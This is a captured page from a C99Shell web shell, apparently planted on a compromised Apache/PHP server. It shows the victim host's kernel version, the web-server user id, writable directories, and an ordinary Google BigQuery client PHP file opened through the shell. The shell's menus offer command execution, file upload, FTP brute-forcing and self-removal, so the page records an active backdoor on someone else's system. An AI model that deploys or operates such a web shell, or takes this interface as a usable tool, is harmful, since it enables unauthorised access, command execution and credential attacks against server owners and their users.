!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/google/apiclient-services/src/Google/Service/Bigquery/   drwxrwxrwx
Free 13.03 GB of 57.97 GB (22.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExternalDataConfiguration.php (4.89 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_Bigquery_ExternalDataConfiguration extends Google_Collection
{
  protected 
$collection_key 'sourceUris';
  public 
$autodetect;
  protected 
$bigtableOptionsType 'Google_Service_Bigquery_BigtableOptions';
  protected 
$bigtableOptionsDataType '';
  public 
$compression;
  public 
$connectionId;
  protected 
$csvOptionsType 'Google_Service_Bigquery_CsvOptions';
  protected 
$csvOptionsDataType '';
  protected 
$googleSheetsOptionsType 'Google_Service_Bigquery_GoogleSheetsOptions';
  protected 
$googleSheetsOptionsDataType '';
  protected 
$hivePartitioningOptionsType 'Google_Service_Bigquery_HivePartitioningOptions';
  protected 
$hivePartitioningOptionsDataType '';
  public 
$ignoreUnknownValues;
  public 
$maxBadRecords;
  protected 
$parquetOptionsType 'Google_Service_Bigquery_ParquetOptions';
  protected 
$parquetOptionsDataType '';
  protected 
$schemaType 'Google_Service_Bigquery_TableSchema';
  protected 
$schemaDataType '';
  public 
$sourceFormat;
  public 
$sourceUris;

  public function 
setAutodetect($autodetect)
  {
    
$this->autodetect $autodetect;
  }
  public function 
getAutodetect()
  {
    return 
$this->autodetect;
  }
  
/**
   * @param Google_Service_Bigquery_BigtableOptions
   */
  
public function setBigtableOptions(Google_Service_Bigquery_BigtableOptions $bigtableOptions)
  {
    
$this->bigtableOptions $bigtableOptions;
  }
  
/**
   * @return Google_Service_Bigquery_BigtableOptions
   */
  
public function getBigtableOptions()
  {
    return 
$this->bigtableOptions;
  }
  public function 
setCompression($compression)
  {
    
$this->compression $compression;
  }
  public function 
getCompression()
  {
    return 
$this->compression;
  }
  public function 
setConnectionId($connectionId)
  {
    
$this->connectionId $connectionId;
  }
  public function 
getConnectionId()
  {
    return 
$this->connectionId;
  }
  
/**
   * @param Google_Service_Bigquery_CsvOptions
   */
  
public function setCsvOptions(Google_Service_Bigquery_CsvOptions $csvOptions)
  {
    
$this->csvOptions $csvOptions;
  }
  
/**
   * @return Google_Service_Bigquery_CsvOptions
   */
  
public function getCsvOptions()
  {
    return 
$this->csvOptions;
  }
  
/**
   * @param Google_Service_Bigquery_GoogleSheetsOptions
   */
  
public function setGoogleSheetsOptions(Google_Service_Bigquery_GoogleSheetsOptions $googleSheetsOptions)
  {
    
$this->googleSheetsOptions $googleSheetsOptions;
  }
  
/**
   * @return Google_Service_Bigquery_GoogleSheetsOptions
   */
  
public function getGoogleSheetsOptions()
  {
    return 
$this->googleSheetsOptions;
  }
  
/**
   * @param Google_Service_Bigquery_HivePartitioningOptions
   */
  
public function setHivePartitioningOptions(Google_Service_Bigquery_HivePartitioningOptions $hivePartitioningOptions)
  {
    
$this->hivePartitioningOptions $hivePartitioningOptions;
  }
  
/**
   * @return Google_Service_Bigquery_HivePartitioningOptions
   */
  
public function getHivePartitioningOptions()
  {
    return 
$this->hivePartitioningOptions;
  }
  public function 
setIgnoreUnknownValues($ignoreUnknownValues)
  {
    
$this->ignoreUnknownValues $ignoreUnknownValues;
  }
  public function 
getIgnoreUnknownValues()
  {
    return 
$this->ignoreUnknownValues;
  }
  public function 
setMaxBadRecords($maxBadRecords)
  {
    
$this->maxBadRecords $maxBadRecords;
  }
  public function 
getMaxBadRecords()
  {
    return 
$this->maxBadRecords;
  }
  
/**
   * @param Google_Service_Bigquery_ParquetOptions
   */
  
public function setParquetOptions(Google_Service_Bigquery_ParquetOptions $parquetOptions)
  {
    
$this->parquetOptions $parquetOptions;
  }
  
/**
   * @return Google_Service_Bigquery_ParquetOptions
   */
  
public function getParquetOptions()
  {
    return 
$this->parquetOptions;
  }
  
/**
   * @param Google_Service_Bigquery_TableSchema
   */
  
public function setSchema(Google_Service_Bigquery_TableSchema $schema)
  {
    
$this->schema $schema;
  }
  
/**
   * @return Google_Service_Bigquery_TableSchema
   */
  
public function getSchema()
  {
    return 
$this->schema;
  }
  public function 
setSourceFormat($sourceFormat)
  {
    
$this->sourceFormat $sourceFormat;
  }
  public function 
getSourceFormat()
  {
    return 
$this->sourceFormat;
  }
  public function 
setSourceUris($sourceUris)
  {
    
$this->sourceUris $sourceUris;
  }
  public function 
getSourceUris()
  {
    return 
$this->sourceUris;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0054 ]--